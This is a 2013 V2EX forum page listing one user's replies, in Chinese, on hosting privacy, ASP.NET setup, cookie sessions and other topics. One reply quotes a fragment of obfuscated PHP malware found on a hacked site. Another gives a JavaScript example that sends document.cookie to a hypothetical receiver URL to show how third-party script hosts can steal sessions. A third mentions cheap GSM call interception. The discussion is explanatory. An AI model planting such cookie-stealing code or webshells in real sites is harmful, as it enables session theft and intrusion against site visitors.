V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  txlty  ›  全部回复第 29 页 / 共 34 页
回复总数  678
1 ... 21  22  23  24  25  26  27  28  29  30 ... 34  
2013-12-27 05:13:36 +08:00
回复了 fdsfsdfsdf3334 创建的主题 问与答 使用阿里云的rds,是否存在数据被偷窥的风险?
很多托管的机子,beian时要提交服务器最高权限密码的。以便WJ随时登上去审查。
如果竟然不用,那就是人家根本不需要那密码。
虚拟主机、VPS、云主机 ,你对人家是完全透明的!!这是常识好伐?人家拿你数据,不是能不能的问题,而是想不想的问题。

你对数据隐私这么担心?那你们用什么IM?用哪家的邮箱?即使是自己域名的企业邮箱,你对邮局提供方也是透明的。除非你们自己搭建邮件服务器。
2013-12-27 03:28:47 +08:00
回复了 kakashilw 创建的主题 iDev 类似这种 [毛笔字] 绘图效果,谁有思路吗?
2013-12-26 06:22:17 +08:00
回复了 hopestar86 创建的主题 PHP php网站被挂马了,请大神帮我翻译下他是干嘛用的,谢谢
天亮了,放弃了。谁有耐心谁解吧。
谁能翻译这个?在容错条件下执行
array('\14',', $',') { ','[$i]','substr($','a = $xx("|","',',strpos($y,"9")',' = str_replace($','x3','\x7','\15',';$i++) {','function ','x6','); ','for($i=0;$i';
2013-12-26 04:17:40 +08:00
回复了 hopestar86 创建的主题 PHP php网站被挂马了,请大神帮我翻译下他是干嘛用的,谢谢
楼上你妹的,没解完你发个蛋。你也卡$v9这了吧?这个解开就全解开了。
2013-12-26 01:13:10 +08:00
回复了 lehui99 创建的主题 分享发现 QQ旋风这是要传播病毒的节奏么
国内互联网基础设施存在安全缺陷,可以在任意网站挂马/篡改文件。也就是万能0day。
验证方法:用其他地区(尽量是国外)的VPS/服务器 下载一下旋风那个离线。如果sha1正常。那就是黑客用上述办法做到的。
2013-12-26 01:01:09 +08:00
回复了 romotc 创建的主题 问与答 阿里 腾讯 金山君,有必要后台一直发送不明请求吗?
楼主知道09年断网事件么?dnspod被黑客打瘫,只能把暴风域名转到电信的DNS解析,电信DNS瞬间被海量请求拖垮,导致国内大面积断网。
http://tech.163.com/09/0523/11/5A0BTQQN000915BF.html
2013-12-23 19:54:56 +08:00
回复了 webjin 创建的主题 Windows 一个会用Visual Studio 2013 开发asp.net的网站的人不懂环境配置
@webjin 在VS里点“编译运行(F5)”,弹出的页面就是运行在IIS Express里的。不用单独安装,也不能用于生产环境。
2013-12-23 18:44:30 +08:00
回复了 webjin 创建的主题 Windows 一个会用Visual Studio 2013 开发asp.net的网站的人不懂环境配置
在vs里点▶,会自动监听端口并弹出浏览器,就是个配置好的模拟环境,不涉及IIS。
我们大三时.net大作业就是asp.net项目,检查时就是点▶,然后看看页面啦、链接啦、按钮啦,数据库增删改查啦。所有的人都通过了。但没一个人会配置IIS环境。
2013-12-22 16:21:03 +08:00
回复了 Ljmac 创建的主题 iDev 苹果开发帐号被封,求补救措施
站长圈有个口号:“低调做站,防止被攻击”。看来移动互联网同样适用。
2013-12-20 04:10:35 +08:00
回复了 tanny 创建的主题 分享发现 剛剛才注意到VLC player換了聖誕主題
预置在软件里的,到日期了自动变。
稍微动动脑筋就可以的。但是别公开讨论~!
2013-12-19 20:18:58 +08:00
回复了 loading 创建的主题 MacBook Air 怎么把xp系统装到U盘,并启动
把xp c盘原封不动拷进U盘,然后用bootice设置一下引导记录。
拷贝时可能有文件卡住,找到文件,在权限设置里取得所有权即可。
2013-12-19 18:39:31 +08:00
回复了 wzlsgspdtc 创建的主题 问与答 上网行为管理是如何实现监控呢?如个人QQ的聊天记录
有网关权限,自然可以截取你上网产生的全部数据。
tx在职能范围内已经尽力了:http://bbs.pediy.com/showthread.php?t=165808

你觉得GSM安全不?2009年末就被破解了。之后伪基站这种设备才大规模出现。
搭建一个GSM监听设备,只需50块钱的成本。照着网上的说明,搭好之后,你就能监听邻居、同事的手机通话和短信了。
2013-12-19 18:23:58 +08:00
回复了 refresh 创建的主题 教育 已为人父的你们,会溺爱孩子吗?
一个孩子,上有两个父母,再上,4个中老年人。在往上,可能还有老人。
6个人围着1个孩子转,怎么可能不溺爱。。

作为程序员,你应该知道,未来社会人类是不用劳动的。机器会帮你把大部分事情做了。
如果连《上下五千年》都没读过。那先把这个读了吧。
验证码、限IP,都无法阻止批量注册行为。
2013-12-17 18:17:57 +08:00
回复了 kran 创建的主题 程序员 基于cookie存储的加密session有什么风险?
@yushiro
@wodemyworld
@binux
@dorentus
不一定需要通信链路上中间人权限、或者电脑中了木马 才能窃取cookie。
任何引入外部的js文件,文件宿主方,都可以窃取目标网站访客的全部cookie!比如:广告联盟代码、统计代码、社会化分享按钮、外部ajax库、社会化评论框、社会化登录按钮。。。。
以v2ex为例,如果google想窃取v2ex全站用户cookie,只要在google-analytics.com/ga.js 里悄悄加几行代码就ok。没有跨域问题,用户也不会收到任何提示。比如:
var url="http://www.google-analytics.com/getcookie.php?cookie="; //假设的接收端
var imgxx = new Image();
imgxx .src = url+document.cookie;
这样,v2ex用户的cookie雪片般飞向google,一天以后,用户cookie就被偷的差不多了。
这只是举例。google不至于这样做。但别的厂商呢?
2013-12-17 17:35:45 +08:00
回复了 kran 创建的主题 程序员 基于cookie存储的加密session有什么风险?
拿到了cookie,就拿到了身份验证所需的全部信息。这是互联网的规则。我试过京东、QQ空间、新浪微博。。。都是这样!
如果你不希望这样,那么只能登录时,把IP也加进去作为判断条件。同时,“下次自动登录” 也失效了。因为国内宽带有海量动态IP用户。
cookie伪造,并不是什么高深的东西,chrome\firefox,装个插件,就可以随意修改cookie。
1 ... 21  22  23  24  25  26  27  28  29  30 ... 34  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5460 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 54ms · UTC 06:34 · PVG 14:34 · LAX 23:34 · JFK 02:34
Developed with CodeLauncher
♥ Do have faith in what you're doing.